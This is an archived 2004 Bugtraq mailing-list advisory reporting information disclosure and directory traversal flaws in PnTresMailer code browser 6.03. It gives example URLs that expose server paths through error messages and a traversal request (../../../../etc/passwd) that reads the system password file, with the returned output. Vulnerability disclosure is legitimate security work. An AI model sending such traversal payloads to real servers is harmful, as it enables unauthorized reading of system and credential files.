PnTresMailer code browser 6.03 Vulnerabilities

To: <bugtraq@xxxxxxxxxxxxxxxxx>
Subject: PnTresMailer code browser 6.03 Vulnerabilities
From: "John Cobb" <johnc@xxxxxxxxxxx>
Date: Fri, 26 Nov 2004 18:59:46 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm
Thread-index: AcTT6hi1l4uhRBisSb6LJuKApiVSew==

Hello All,

PnTresMailer code browser 6.03 is open to information disclosure.
Authors Site:    http://canvas.anubix.net


+-[Examples:]-----+

[1]

www.victimsite.com/codebrowserpntm.php?foldertohighlight=pnTresMailer&fileto
highlight=w00t

Warning: highlight_file(codebrowserPnTM/pnTresMailer/w00t): failed to open
stream: No such file or directory in 
/var/www/html/codebrowserpntm.php on line 130
Warning: highlight_file(): Failed opening
'codebrowserPnTM/pnTresMailer/w00t' for highlighting in 
/var/www/html/codebrowserpntm.php on line 130


[2]

www.victimsite.com/codebrowserpntm.php?downloadfolder=pnTresMailer&filetodow
nload=../../../../etc/passwd

Look what ive got...

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync

+-[Notes:]-------+ 

Author is yet to be informed, will do so tonight.

 

Regards

John C

JohnC@xxxxxxxxxxx

Prev by Date: FluxBox crash vulnerability
Next by Date: Re: Winamp - Buffer Overflow In IN_CDDA.dll [Unpatched]
Previous by thread: FluxBox crash vulnerability
Next by thread: Java version downgrading proof-of-concept
Index(es):
- Date
- Thread